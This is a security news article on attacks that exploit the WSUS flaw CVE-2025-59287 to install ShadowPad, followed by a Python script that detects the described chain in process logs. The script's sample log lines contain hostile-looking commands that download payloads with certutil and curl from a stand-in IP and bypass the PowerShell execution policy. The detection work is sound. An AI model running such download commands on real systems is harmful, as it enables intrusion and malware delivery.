Critical WSUS RCE (CVE-2025-59287) Actively Exploited to Deploy ShadowPad Espionage Tool
A recently patched vulnerability in Microsoft’s Windows Server Update Services has triggered a wave of attacks involving one of the most notable espionage tools of recent years. The incidents underscore how swiftly adversaries move from examining a publicly released proof-of-concept to actively exploiting a flaw for infiltration.
According to the South Korean firm AhnLab, an unidentified group gained access to Windows servers with WSUS enabled by exploiting CVE-2025-59287. Through this flaw, attackers invoked built-in system utilities to contact an external server and retrieve malicious payloads. Before deploying the primary toolset, they used PowerCat to establish a remote command shell. They then leveraged certutil and curl to deliver ShadowPad onto the compromised system.
ShadowPad, regarded as an evolution of PlugX, has long been associated with China-linked threat actors. Its architecture is modular, and its execution hinges on DLL hijacking: a legitimate executable, ETDCtrlHelper.exe, loads a malicious in-memory DLL responsible for running the core payload. The embedded module subsequently loads additional components and employs various stealth and persistence techniques.
Microsoft issued a patch for CVE-2025-59287 a month ago. Classified as critical, the flaw allows arbitrary code execution with SYSTEM-level privileges. Once a demonstration exploit became public, numerous groups began scanning accessible WSUS servers en masse, gaining initial footholds, performing reconnaissance, and deploying both malicious files and legitimate administrative utilities. According to AhnLab’s observations, this is precisely how ShadowPad found its way onto targeted servers.
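The chain AhnLab describes (WSUS server process, then a built-in utility such as certutil or curl fetching a payload from an outside host) is a pattern a detection engineer can hunt for in process-creation telemetry. The script below is an added example written for this page, not code from AhnLab or from the article. It assumes a simplified, constructed record format (`chain=parent>child|cmdline=...`) rather than any particular EDR's schema, and it assumes that WSUS code executes under the IIS worker process `w3wp.exe` and the `WsusService.exe` service binary, neither of which the article names.

```python
"""Flag process-creation records that match the WSUS post-exploitation chain
described in the article: a WSUS-related process (directly or via cmd.exe)
launching a built-in download or shell utility that reaches an external URL.
Added example for this page; log format and parent names are assumptions."""
import re
from dataclasses import dataclass

# ASSUMPTION (not from the article): WSUS code runs inside the IIS worker
# process and the WSUS service; these are the ancestors worth keying on.
WSUS_ANCESTORS = {"w3wp.exe", "wsusservice.exe"}
# Built-in tools the article names for payload delivery and remote shells,
# plus the interpreters normally used to launch them.
LOLBINS = {"certutil.exe", "curl.exe", "powershell.exe", "cmd.exe"}
URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)


@dataclass
class ProcEvent:
    chain: list      # ancestry, oldest first, e.g. ["w3wp.exe", "cmd.exe", "certutil.exe"]
    cmdline: str

    @property
    def image(self):
        return self.chain[-1]


def parse_line(line):
    """Parse one record in the constructed 'chain=a>b>c|cmdline=...' format."""
    fields = dict(part.split("=", 1) for part in line.strip().split("|"))
    chain = [p.strip().lower() for p in fields["chain"].split(">")]
    return ProcEvent(chain, fields["cmdline"])


def classify(ev):
    """Return the reasons this event resembles the WSUS exploitation chain."""
    reasons = []
    if WSUS_ANCESTORS & set(ev.chain[:-1]) and ev.image in LOLBINS:
        reasons.append("wsus_process_spawned_lolbin")
        cmd = ev.cmdline.lower()
        if ev.image == "certutil.exe" and "-urlcache" in cmd:
            reasons.append("certutil_download")
        if ev.image in {"curl.exe", "certutil.exe"} and URL_RE.search(ev.cmdline):
            reasons.append("external_url_in_cmdline")
    return reasons


def analyze(lines):
    """Return (record_number, reasons) for every record that trips a rule."""
    hits = []
    for n, line in enumerate(lines, 1):
        reasons = classify(parse_line(line))
        if reasons:
            hits.append((n, reasons))
    return hits


# Constructed sample telemetry; 203.0.113.7 is a documentation-range address.
SAMPLE_LOG = [
    "chain=w3wp.exe>cmd.exe>certutil.exe|cmdline=certutil.exe -urlcache -split -f "
    "http://203.0.113.7/payload.bin C:\\Windows\\Temp\\payload.bin",
    "chain=wsusservice.exe>powershell.exe|cmdline=powershell.exe -ExecutionPolicy Bypass "
    "-File C:\\Windows\\Temp\\pc.ps1",
    "chain=explorer.exe>cmd.exe>curl.exe|cmdline=curl.exe -o report.json "
    "https://intranet.example.com/api",
    "chain=services.exe>wsusservice.exe|cmdline=WsusService.exe",
    "chain=w3wp.exe>cmd.exe>curl.exe|cmdline=curl.exe -o C:\\Windows\\Temp\\a.dat "
    "http://203.0.113.7/a.dat",
]

if __name__ == "__main__":
    for n, reasons in analyze(SAMPLE_LOG):
        print(f"record {n}: {', '.join(reasons)}")
```

Records 1, 2 and 5 fire; record 3 (an interactive curl with no WSUS ancestor) and record 4 (the WSUS service itself starting) do not. The rule keys on ancestry rather than on the immediate parent because the article's chain runs through cmd.exe before the downloader is launched; a parent-only rule would miss it.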
The incident serves as a stark reminder that any unpatched vulnerability can rapidly escalate into a genuine threat. The sooner organizations remediate newly discovered weaknesses, the fewer opportunities attackers have to establish persistence and turn an isolated flaw into a full-scale crisis.